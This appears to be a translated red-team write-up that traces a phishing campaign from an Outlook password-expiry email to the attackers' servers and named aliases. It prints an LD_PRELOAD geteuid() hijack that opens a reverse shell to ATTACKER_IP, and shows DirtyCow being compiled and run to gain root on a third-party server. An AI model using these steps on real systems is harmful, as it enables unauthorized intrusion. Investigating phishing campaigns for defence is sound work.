How Red Team Techniques Uncover Phishing Attack Origins: A Step‑by‑Step Guide

Introduction

Statistics show that about 92% of data‑leak incidents involve social‑engineering and phishing attacks, which have become the primary entry point for APT campaigns. Attackers lure victims to click malicious links or open infected attachments to steal credentials and later compromise corporate networks.

Phishing Classification

By attack method : • Mass‑mail phishing – broad‑scale credential harvesting. • Spear‑phishing – targeted, highly crafted emails often used in APT attacks. By email content : • Malicious links (fake login pages, compromised file downloads). • Malicious attachments (Office macros, disguised executables). • 0‑day/N‑day exploits targeting browsers, Office, PDF readers.

Information Collection

Red‑team operators often use compromised “zombie” servers as infrastructure (jump proxies, mail servers, fake phishing sites). Understanding common mail‑header fields is essential for tracing.

(1) Received: routing information<br/>(2) Date: creation time of the email<br/>(3) From: author (can be spoofed)<br/>(4) To: recipient address<br/>(5) CC: carbon copy<br/>(6) BCC: blind carbon copy<br/>(7) Subject: email subject<br/>(8) Sender: actual SMTP sender<br/>(9) Reply‑To: reply address<br/>(10) MIME‑Version<br/>(11) Content‑Type<br/>(12) Return‑Path

Email Sample Analysis

A real‑world example of a Microsoft Outlook WebApp password‑expiry phishing email is shown below.

The email was exported as an .eml file; its header and body reveal the attacker’s infrastructure.

// Email header<br/>Received: from sysmailout1.platon.sk (85.248.228.17)<br/>X‑QQ‑SPAM: true<br/>...<br/>Subject: =?UTF-8?Q?Password_expiry_notice?=<br/>From: =?UTF-8?Q?Microsoft_Online_Services_Team?=

// Email body (truncated)<br/>The password for the Microsoft 365 account [email protected] has expired.<br/>Please <a href="http://www.rosturplast.com/shells/logon.secureaccess/?ml=test@cn">change your password</a> immediately.

Phishing Site Vulnerability Analysis

The malicious site www.rosturplast.com mimics an OWA password‑reset page. Submitting any password triggers an error page, indicating a smoke‑screen to collect correct credentials. The site runs Joomla 3.3.3, which was scanned for CVE‑2016‑9838, but the vulnerability had already been patched.

Further exploitation ideas include directory brute‑forcing, side‑site mirroring, and C‑segment scanning.

[+] HOST: www.rosturplast.com (137.74.81.5 – France)<br/>[+] OS: Red Hat 4.8<br/>[+] Web Server: Apache/2.4.6 OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16<br/>[+] CMS: Joomla 3.3.3

Webshell Decryption and Privilege Escalation

The attacker’s encrypted webshell config.php on www.mirohaviar.sk was decoded through a series of base64 and hex transformations, ultimately revealing the clear‑text payload.

awk -F " '{print $2}' config.php | base64 -d -i | awk -F " '{print $2}' | sed 's/\x//g' | tr -d '\' | xxd -r -p | base64 -d -i | ... (repeat)

To bypass disable_functions and open_basedir, an LD_PRELOAD shared library was crafted to hijack geteuid() and execute a reverse shell.

#include <stdlib.h><br/>void payload(){ system("bash -i >& /dev/tcp/ATTACKER_IP/999 0>&1"); }<br/>int geteuid(){ if(getenv("LD_PRELOAD") == NULL) return 0; unsetenv("LD_PRELOAD"); payload(); }

Log Analysis and Attacker Attribution

Web‑access logs were parsed to extract frequent IPs contacting the malicious scripts. Geo‑IP lookup revealed origins in the United States, Nigeria, Romania, Norway, Italy, and other countries.

grep "/shells/" * | grep php | awk -F ':' '{print $2}' | sort -nr

Google‑hacking uncovered deleted back‑door snapshots, confirming the involvement of the group “Muslim Cyber Corp – Mujahidin Cyber Army – Family Attack Cyber”.

Puppet Server Vulnerability Analysis

The puppet server 187.85.134.4 (Brazil) runs Apache/2.2.22 with PHP 5.3.10. Scanning revealed a low‑version ProFTPD vulnerability, which could be used to upload a webshell.

[+] HOST: 187.85.134.4 (Brazil)<br/>[+] OS: Ubuntu<br/>[+] Web Server: Apache/2.2.22 PHP/5.3.10

The server stores massive email address lists (≈624 000 entries) for phishing campaigns and contains Perl scripts for mass mail distribution, DDOS tools, and mining back‑doors.

Privilege Escalation on Linux

Local kernel exploits (CVE‑2013‑2094, CVE‑2013‑1763) failed due to dependencies, but the DirtyCow exploit (CVE‑2016‑5195) succeeded, granting root on the puppet server.

gcc -Wall -o dirtycow dirtycow.c -ldl -lpthread<br/>./dirtycow   # escalates to root

Information Summary

Victim distribution heat‑maps show most targets in Europe and Asia. The identified hacker group originates from Palestine, with known aliases such as Hawk_B404, MR.S1NS_Y, and others. Their public footprints include a blog and a Facebook page.

Attack Path Reconstruction

Combining all evidence—email headers, malicious site analysis, web‑shell decryption, log mining, and privilege escalation—allows a complete reconstruction of the attack chain, providing valuable intelligence for incident responders and law‑enforcement.